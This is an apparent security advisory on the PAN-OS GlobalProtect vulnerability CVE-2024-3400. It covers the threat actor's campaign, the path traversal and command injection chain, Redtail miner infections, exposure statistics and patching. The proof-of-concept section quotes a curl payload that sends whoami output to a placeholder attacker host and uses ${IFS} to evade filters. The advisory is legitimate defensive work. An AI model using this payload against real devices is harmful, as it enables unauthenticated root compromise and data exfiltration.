PAN-OS Command Injection (CVE-2024-3400)
Cyber Security Associates
Providing Cyber Security Solutions designed to Protect your People
Written by: James Rowley
Executive Summary
On the 10th of April 2024, cybersecurity firm Volexity detected a zero-day vulnerability in the GlobalProtect feature of Palo Alto Networks’ PAN-OS. The vulnerability was being exploited by a threat actor, tracked as UTA0218, who was able to remotely compromise a firewall device, create a reverse shell and download additional tools onto the device. The attacker’s primary focus was exporting configuration data from the devices and using it as an entry point for lateral movement within the victim organisations.
Volexity collaborated with Palo Alto Networks Product Security Incident Response Team (PSIRT) to investigate the compromise. During the investigation, Volexity observed that UTA0218 attempted and failed to install a custom Python backdoor, named “UPSTYLE”, on the firewall. The purpose of this backdoor was to allow the attacker to execute additional commands on the device via specially crafted network requests.
Volexity discovered successful exploitation at multiple organisations dating back to the 26th of March. These attempts appear to be the threat actor testing the vulnerability by placing zero-byte files on firewall devices to validate exploitability. On the 7th of April, Volexity observed the attacker attempting and failing to deploy a backdoor on a customer’s firewall device and three days later, UTA0218 was observed exploiting firewall devices and successfully deploying malicious payloads.
After successful exploitation, UTA0218 downloaded additional tooling from remote servers they controlled to facilitate access to victims’ internal networks. They quickly moved laterally through victims’ networks, extracting sensitive credentials and other files that would enable access during and potentially after the intrusion. The tradecraft and speed employed by the attacker suggest a competent threat actor with a clear playbook.
Since the vulnerability was identified, numerous proof-of-concept examples have been released and it is currently under active exploitation by threat actors throughout the world. The vulnerability has been confirmed as an OS command injection issue and assigned the identifier CVE-2024-3400. It is an unauthenticated remote code execution vulnerability with a CVSS base score of 10.0. Palo Alto Networks has issued an advisory for CVE-2024-3400 and released a fix for all affected versions of PAN-OS on the 14th of April 2024.
Affected Software/Systems
This problem pertains solely to firewalls running on PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1, that are set up with either the GlobalProtect gateway, the GlobalProtect portal, or both. It’s important to note that even if device telemetry is not activated, PAN-OS firewalls can still be susceptible to attacks associated with this vulnerability.
Discovery
On the 10th of April 2024, a zero-day exploitation of a vulnerability within the GlobalProtect feature of Palo Alto Networks PAN-OS was detected during network security monitoring operations. Suspicious network traffic from a monitored firewall triggered alerts and an initial probe confirmed the device’s compromise. The following day, identical exploitation was observed at another operation carried out by the same threat actor.
As the investigation broadened, successful breaches at various clients and organizations were discovered, dating back to the 26th of March. These breaches appeared to be the threat actor’s attempts to test the vulnerability by placing zero-byte files on firewall devices. On the 7th of April, an unsuccessful attempt to install a backdoor on a client’s firewall device was observed. However, by the 10th, the threat actor had successfully delivered malicious payloads by exploiting firewall devices. A similar breach was observed the next day.
Following the exploitation, the threat actor downloaded additional tools from their controlled servers to facilitate access to the victims’ networks. They swiftly navigated through the networks, gathering sensitive credentials and other files that could facilitate access during and possibly after the breach.
The attacker’s speed and methods indicate the involvement of a highly skilled threat actor with a well-defined plan. At present, it’s not possible to estimate the full extent of the initial exploitation, but it’s probable that the exploitation was restricted and targeted.
Proof of Concept
It has been determined that the threat is a chain of exploits, made up of two separate vulnerabilities: one is a path traversal attack vulnerability present in the GlobalProtect web server and the other is a command injection vulnerability found in the device telemetry feature.
Path Traversal
In this HTTP request, the Cookie header carries a path traversal payload:
This payload aims to generate a file named poc.txt in the given directory: “/var/appweb/sslvpndocs/global-protect/portal/images/” with root permissions.
To verify the vulnerability, another HTTP request is sent to access the newly created file:
If the system is vulnerable, it will return a 403 status code (Forbidden) when trying to access the poc.txt file, contrary to the anticipated 404 status code (Not Found).
Command Injection
In this HTTP request, a command injection payload is incorporated in the Cookie header and placed within the directory: “/../../../opt/panlogs/tmp/device_telemetry/minute/h4“ This directory is associated with a cron job which runs every minute.
Recommended by LinkedIn
The payload, represented as ”curl${IFS}http://C2?test=$(whoami)`;“ uses the curl command to send a HTTP request to an attacker-controlled domain, with the whoami command’s output appended as a query parameter. It employs the Internal Field Separator (${IFS}) to bypass filters that might block spaces.
If the system is open to attack, the payload will run the whoami command and send the result to http://C2, a domain the attacker controls. If the server responds with the output of the whoami command, the system is vulnerable and open to further exploitation.
Observations
CSA has observed several instances of this vulnerability being actively exploited in an attempt to infect its clients with malware.
Analysis of a client's Azure Web Application Firewall logs reveals a request made to a web server with a crafted payload in an attempt to download a bash script.
This script is designed to download and execute a file from a remote server based on the host system’s architecture. It first identifies the system’s architecture and checks for writable directories. It then removes any existing files with the same name as the one it intends to download. Depending on the system’s architecture, it downloads a specific file from a remote server using either wget or curl. If the system’s architecture doesn’t match any of the specified ones, it attempts to download files for all architectures. Finally, it executes the downloaded file.
Sandbox analysis of the downloaded ELF file reveals that it is a strain of the crypto-mining malware Redtail. The use of Redtail on an always-on firewall is a tactic that not only compromises the firewall's security integrity but also generates a revenue stream for a threat actor and is highly unlikely to be detected for some time.
Observations such as these demonstrate that malicious actors are already actively exploiting this vulnerability as a means to gain an initial foothold in victim networks.
Impact
It is unclear at the time of writing how many successful attacks have been initiated, however, it has been reported by the organisation, ShadowServer, that roughly 22,542 PAN-OS firewall instances are still exposed on the internet. Most of the devices are located in the United States (9,620), followed by Japan (960), India (890), Germany (790), the UK (780), Canada (620), Australia (580), and France (500).
Despite the presence of a considerable number of firewalls that could potentially be vulnerable, it has been reported that about 73% of all exposed PAN-OS systems received patches within a week.
CVSS Score
The discovery and reporting of this vulnerability were initially made by Volexity on the 10th of April 2024. Following this, the Cybersecurity and Infrastructure Security Agency (CISA) incorporated CVE-2024-3400 into its Known Exploited Vulnerability Catalog on the 12th of April 2024. This flaw has been assigned the highest severity rating of 10.0 as it provides an unauthenticated user with the capability to execute arbitrary commands on the target system with root-level privileges.
Indicators of Compromise
Mitigation/Remediation Steps
Upgrading to a patched version of PAN-OS can enhance device security, even when workarounds and mitigations have been implemented. The issue has been addressed in the following hotfix releases:
In previous advisories, disabling device telemetry was suggested as an additional mitigation measure. However, this is no longer considered an effective strategy. It should be noted that PAN-OS firewalls can still be exposed to attacks related to this vulnerability, irrespective of the status of device telemetry.
References